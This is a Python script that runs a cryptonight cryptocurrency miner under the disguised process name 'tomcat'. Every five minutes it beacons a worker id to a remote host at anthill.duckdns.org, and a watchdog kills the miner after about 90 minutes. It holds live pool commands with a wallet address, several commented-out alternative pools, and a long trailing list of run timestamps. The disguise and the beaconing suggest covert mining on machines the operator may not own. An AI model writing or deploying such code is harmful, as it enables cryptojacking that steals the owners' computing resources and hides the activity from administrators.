import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:04:01.424555
#2018-02-17 16:50:06.221190
#2018-02-17 18:38:01.688579
#2018-02-17 20:26:01.676918
#2018-02-17 22:12:06.453154
#2018-02-17 23:56:07.686925
#2018-02-18 01:47:05.362675
#2018-02-18 03:34:04.524145
#2018-02-18 05:22:01.335288
#2018-02-18 07:14:02.185000
#2018-02-18 09:02:04.917255
#2018-02-18 10:49:05.548454
#2018-02-18 12:34:07.195764
#2018-02-18 14:21:02.114331
#2018-02-18 16:12:04.610152
#2018-02-18 18:00:07.957173
#2018-02-18 19:47:07.179774
#2018-02-18 21:32:06.899729
#2018-02-18 23:19:07.344986
#2018-02-19 01:07:04.303034
#2018-02-19 02:53:05.474905
#2018-02-19 04:41:05.585924
#2018-02-19 06:25:07.492868
#2018-02-19 08:14:05.503051
#2018-02-19 10:04:05.404314
#2018-02-19 11:53:06.748743
#2018-02-19 13:39:06.753064
#2018-02-19 15:26:06.603339
#2018-02-19 17:14:08.533233
#2018-02-19 19:02:05.097056
#2018-02-19 20:48:01.279067
#2018-02-19 22:36:06.250212
#2018-02-20 00:22:04.035626
#2018-02-20 02:10:01.338089
#2018-02-20 03:59:01.915453
#2018-02-20 05:44:04.504482
#2018-02-20 07:28:07.561417
#2018-02-20 09:13:06.673935
#2018-02-20 10:56:01.312960
#2018-02-20 12:44:02.083378
#2018-02-20 14:29:09.488213
#2018-02-20 16:13:09.820669
#2018-02-20 17:58:02.173500
#2018-02-20 19:49:08.871731
#2018-02-20 21:32:04.193694
#2018-02-20 23:15:04.613954
#2018-02-21 01:00:06.960833
#2018-02-21 02:47:04.034322
#2018-02-21 04:35:01.277774
#2018-02-21 06:23:01.868011
#2018-02-21 08:07:07.453972
#2018-02-21 09:53:05.888338
#2018-02-21 11:42:04.413479
#2018-02-21 13:32:05.990890
#2018-02-21 15:17:01.984231
#2018-02-21 17:07:01.667191
#2018-02-21 18:54:07.536016
#2018-02-21 20:43:05.713012
#2018-02-21 22:27:06.471442
#2018-02-22 00:17:06.279967
#2018-02-22 02:05:06.308331
#2018-02-22 03:51:07.527452
#2018-02-22 05:39:06.037796
#2018-02-22 07:24:01.888422
#2018-02-22 09:11:06.844116
#2018-02-22 11:00:01.511070
#2018-02-22 12:47:07.705759
#2018-02-22 14:32:08.288016
#2018-02-22 16:18:04.310943
#2018-02-22 18:04:10.000178
#2018-02-22 19:54:05.248110
#2018-02-22 21:43:08.825187
#2018-02-22 23:53:01.291534
#2018-02-23 01:41:06.434216
#2018-02-23 03:29:08.182107
#2018-02-23 05:15:08.882951
#2018-02-23 07:02:05.799084
#2018-02-23 08:52:02.856302
#2018-02-23 11:10:10.079569
#2018-02-23 13:04:06.981737
#2018-02-23 14:49:03.464262
#2018-02-23 16:38:07.733526
#2018-02-23 18:25:12.075315
#2018-02-23 20:11:06.753968
#2018-02-23 22:02:01.571514
#2018-02-23 23:49:07.054188
#2018-02-24 01:40:04.208605
#2018-02-24 03:28:04.949734
#2018-02-24 05:14:07.064241
#2018-02-24 07:04:04.203369
#2018-02-24 08:51:05.954227
#2018-02-24 10:54:05.999174
#2018-02-24 12:42:01.736930
#2018-02-24 14:31:06.101167
#2018-02-24 16:18:04.744361
#2018-02-24 18:12:06.711232
#2018-02-24 19:58:07.471666
#2018-02-24 21:42:01.806422
#2018-02-25 00:36:01.326009
#2018-02-25 04:20:01.319217
#2018-02-25 07:51:05.057485